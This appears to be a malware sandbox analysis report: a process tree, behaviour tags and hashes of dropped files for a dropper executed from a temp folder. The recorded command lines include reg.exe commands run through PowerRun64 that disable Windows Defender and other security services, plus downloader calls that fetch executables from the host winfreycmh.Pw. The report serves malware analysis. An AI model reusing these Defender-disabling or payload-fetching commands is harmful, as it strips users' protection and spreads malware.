C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f9⤵PID:5488
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f10⤵PID:5724
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f7⤵PID:5376
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f8⤵PID:4152
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f9⤵PID:5344
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f10⤵PID:5428
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f7⤵PID:5628
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f8⤵PID:5776
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f9⤵PID:6016
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f10⤵PID:5164
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f7⤵PID:5856
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f8⤵
- Modifies data under HKEY_USERS
PID:5780 -
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f9⤵PID:6060
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f10⤵PID:3200
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f7⤵PID:5948
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f8⤵PID:6112
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f9⤵PID:5300
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f10⤵PID:5360
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f7⤵PID:6120
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f8⤵PID:5216
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f9⤵PID:5268
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f10⤵PID:5588
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f7⤵PID:5364
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f8⤵PID:5440
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f9⤵PID:5608
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f10⤵PID:6092
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f7⤵PID:5676
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f8⤵
- Modifies Windows Defender Real-time Protection settings
PID:5048 -
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f9⤵PID:5192
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f10⤵PID:3028
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵PID:2932
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f7⤵PID:5980
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f8⤵PID:6088
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f9⤵PID:5196
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f10⤵PID:5340
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Get-MpPreference"7⤵PID:6020
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^a')7⤵PID:5288
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^c')7⤵PID:5740
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\mygyc.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\mygyc.exe" "http://www.winfreycmh.Pw/ee/51482891?64825090f64825090=1688946376091796500=0- 4253"6⤵PID:5216
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Modifies Windows Defender Real-time Protection settings
PID:5036
-
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 6927⤵PID:5848
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\bsetgaf.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\bsetgaf.exe" "http://www.winfreycmh.Pw/ee/51482891?64825090g64825090==992217=992217;1" "992217;mdf7r;992217;1688946376091796500;1688946376091796500" "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\64825090"6⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4532
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\bsetgaf.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\bsetgaf.exe" "http://www.winfreycmh.Pw/Qzgfh.exe" "992217;tq5bw;1688946376091796500" "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\Qzgfh.exe"6⤵PID:5316
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\mygyc.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\mygyc.exe" "http://www.winfreycmh.Pw/ee/51482891?64825090f64825090=1688946376091796500=-exe-0" "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\4253"6⤵PID:2676
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\mygyc.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\mygyc.exe" "http://www.winfreycmh.Pw/ee/51482891?64825090f64825090=1688946376091796500=hfhtvuhuhfhtvuhu" "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\4253"6⤵PID:5552
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\Qzgfh.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\Qzgfh.exe" "mygyc.exe" "http://www.winfreycmh.Pw"6⤵PID:2044
-
C:\Users\Admin\AppData\Local\Temp\nsk4E85.tmp\MicrosoftEdgeWebview2Setup.exe"C:\Users\Admin\AppData\Local\Temp\nsk4E85.tmp\MicrosoftEdgeWebview2Setup.exe" /silent /install7⤵PID:660
-
C:\Program Files (x86)\Microsoft\Temp\EU4F01.tmp\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\Temp\EU4F01.tmp\MicrosoftEdgeUpdate.exe" /silent /install "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers"8⤵PID:2400
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc9⤵PID:3964
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver9⤵PID:5340
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.175.27\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.175.27\MicrosoftEdgeUpdateComRegisterShell64.exe"10⤵PID:3564
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.175.27\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.175.27\MicrosoftEdgeUpdateComRegisterShell64.exe"10⤵PID:4964
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.175.27\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.175.27\MicrosoftEdgeUpdateComRegisterShell64.exe"10⤵PID:4696
-
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzUuMjciIHNoZWxsX3ZlcnNpb249IjEuMy4xNzUuMjciIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7N0M0QkEwOTctMEMyMi00RUI3LUI5NTYtQ0UwRDc3QzFBMThBfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9IntBMjQ1OUYwMS1CNTUwLTQyNzEtOEI2OS00MzQyQzExMTMwN0Z9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iNCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE1MDYzLjAiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iREFEWSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiIvPjxhcHAgYXBwaWQ9IntGM0M0RkUwMC1FRkQ1LTQwM0ItOTU2OS0zOThBMjBGMUJBNEF9IiB2ZXJzaW9uPSIiIG5leHR2ZXJzaW9uPSIxLjMuMTc1LjI3IiBsYW5nPSIiIGJyYW5kPSIiIGNsaWVudD0iIj48ZXZlbnQgZXZlbnR0eXBlPSIyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1OTI4MjE5NTY2IiBpbnN0YWxsX3RpbWVfbXM9IjEyNDciLz48L2FwcD48L3JlcXVlc3Q-9⤵PID:2512
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /handoff "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers" /installsource otherinstallcmd /sessionid "{7C4BA097-0C22-4EB7-B956-CE0D77C1A18A}" /silent9⤵PID:4508
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\mygyc.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\mygyc.exe" "http://www.winfreycmh.Pw/ee/51482891?64825090f64825090=1688946376091796500=hfhtvuhuhfhtvuhuhfhtvuhu4" "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\4253"6⤵PID:3768
-
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3580
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:3056
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:812
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1612
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:3696
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k wsappx -s AppXSvc1⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5088
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4920
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:4648
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Windows Defender Real-time Protection settings
- Drops file in Windows directory
- Modifies registry class
PID:3904
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}1⤵
- Modifies Windows Defender Real-time Protection settings
PID:4464
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:5232
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:508
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc1⤵PID:5360
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzUuMjciIHNoZWxsX3ZlcnNpb249IjEuMy4xNzUuMjciIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7N0M0QkEwOTctMEMyMi00RUI3LUI5NTYtQ0UwRDc3QzFBMThBfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9IntGNjdFNTU5Qi02RDRCLTQzQjUtQjQ1Qi04NTQ3NTkwMkIxMTl9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iNCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE1MDYzLjAiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iREFEWSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiIvPjxhcHAgYXBwaWQ9Ins4QTY5RDM0NS1ENTY0LTQ2M2MtQUZGMS1BNjlEOUU1MzBGOTZ9IiB2ZXJzaW9uPSIxMDYuMC41MjQ5LjExOSIgbmV4dHZlcnNpb249IjEwNi4wLjUyNDkuMTE5IiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIj48ZXZlbnQgZXZlbnR0eXBlPSIzMSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMyIgc3lzdGVtX3VwdGltZV90aWNrcz0iNTkzMzYwOTgxNyIvPjwvYXBwPjwvcmVxdWVzdD42⤵PID:5512
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{B7F15F74-2566-4F68-8F8E-3A1945F45FD1}\MicrosoftEdge_X64_114.0.1823.67.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{B7F15F74-2566-4F68-8F8E-3A1945F45FD1}\MicrosoftEdge_X64_114.0.1823.67.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level2⤵PID:2520
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{B7F15F74-2566-4F68-8F8E-3A1945F45FD1}\EDGEMITMP_3D23D.tmp\setup.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{B7F15F74-2566-4F68-8F8E-3A1945F45FD1}\EDGEMITMP_3D23D.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{B7F15F74-2566-4F68-8F8E-3A1945F45FD1}\MicrosoftEdge_X64_114.0.1823.67.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level3⤵PID:5800
-
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵PID:4560
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\Download\{F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}\114.0.1823.67\MicrosoftEdge_X64_114.0.1823.67.exe
Filesize141.4MB
MD595e7604482c3bfac4b54cf5c73d9ad81
SHA11fd8708cca10e273c143fca18e2cf67c7dcd461d
SHA2569228902ccc30ed3f0392cd42b88c6db1d078782c32ed374caded17d70b8397ba
SHA51291f0f837c505e12a572eb7753e2c935d81c3178415889cfc6ce6929c1633b5acf153da30243ca5c13f6feacba3bf9f3994ed57758402dca1b1b483bf9ce4d2bf
-
Filesize
201KB
MD54cb326ff5bdb251b9f92b35e4a4d7741
SHA126442b959c62db6604f6d0bffaab38ca39050b62
SHA25638a44760c4b6fd553531d7f99f6f78110f488e57ee00d2fc498635ec7ab4a478
SHA5129d62f48be43de8e6a60ee40f9e982c1906273b65c96299ae68e1f72e31b8f78dd01199b36f62e61836a2c0d84fc106ae550cf94ffe2cb9b6a082774cb8eedea4
-
Filesize
14KB
MD58e6cf9e3141dea759a66f51df1633e78
SHA1f133e6d64f971071f7646067e5f1afe3c5f64490
SHA25642b6ed5126c5468cfb1f11797a26d4f85f696da1d4eb86aa58198bead9828bbd
SHA5127b75e5d547ae0d59ebd3a989852a1b85b36f6d2fc858dafed38188c036353f2717629fae4fa65b78e742e4ab05e2eb47764a817d2da8e6976cfa1003384f3311
-
Filesize
320KB
MD5c94005d2dcd2a54e40510344e0bb9435
SHA155b4a1620c5d0113811242c20bd9870a1e31d542
SHA2563c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899
SHA5122e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a
-
Filesize
755KB
MD50e37fbfa79d349d672456923ec5fbbe3
SHA14e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA2568793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA5122bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630
-
Filesize
195B
MD5e9609072de9c29dc1963be208948ba44
SHA103bbe27d0d1ba651ff43363587d3d6d2e170060f
SHA256dc6a52ad6d637eb407cc060e98dfeedcca1167e7f62688fb1c18580dd1d05747
SHA512f0e26aa63b0c7f1b31074b9d6eef88d0cfbc467f86b12205cb539a45b0352e77ce2f99f29baeab58960a197714e72289744143ba17975699d058fe75d978dfd0
-
Filesize
3.6MB
MD5d3d39180e85700f72aaae25e40c125ff
SHA1f3404ef6322f5c6e7862b507d05b8f4b7f1c7d15
SHA25638684adb2183bf320eb308a96cdbde8d1d56740166c3e2596161f42a40fa32d5
SHA512471ac150e93a182d135e5483d6b1492f08a49f5ccab420732b87210f2188be1577ceaaee4ce162a7acceff5c17cdd08dc51b1904228275f6bbde18022ec79d2f
-
Filesize
387KB
MD52c88d947a5794cf995d2f465f1cb9d10
SHA1c0ff9ea43771d712fe1878dbb6b9d7a201759389
SHA2562b92ea2a7d2be8d64c84ea71614d0007c12d6075756313d61ddc40e4c4dd910e
SHA512e55679ff66ded375a422a35d0f92b3ac825674894ae210dbef3642e4fc232c73114077e84eae45c6e99a60ef4811f4a900b680c3bf69214959fa152a3dfbe542
-
Filesize
633B
MD5ae72e7e3fcb4807d9b72e3797f7180d1
SHA1d3891f3987b12221e7fdb44c61f6fcc808b8cf18
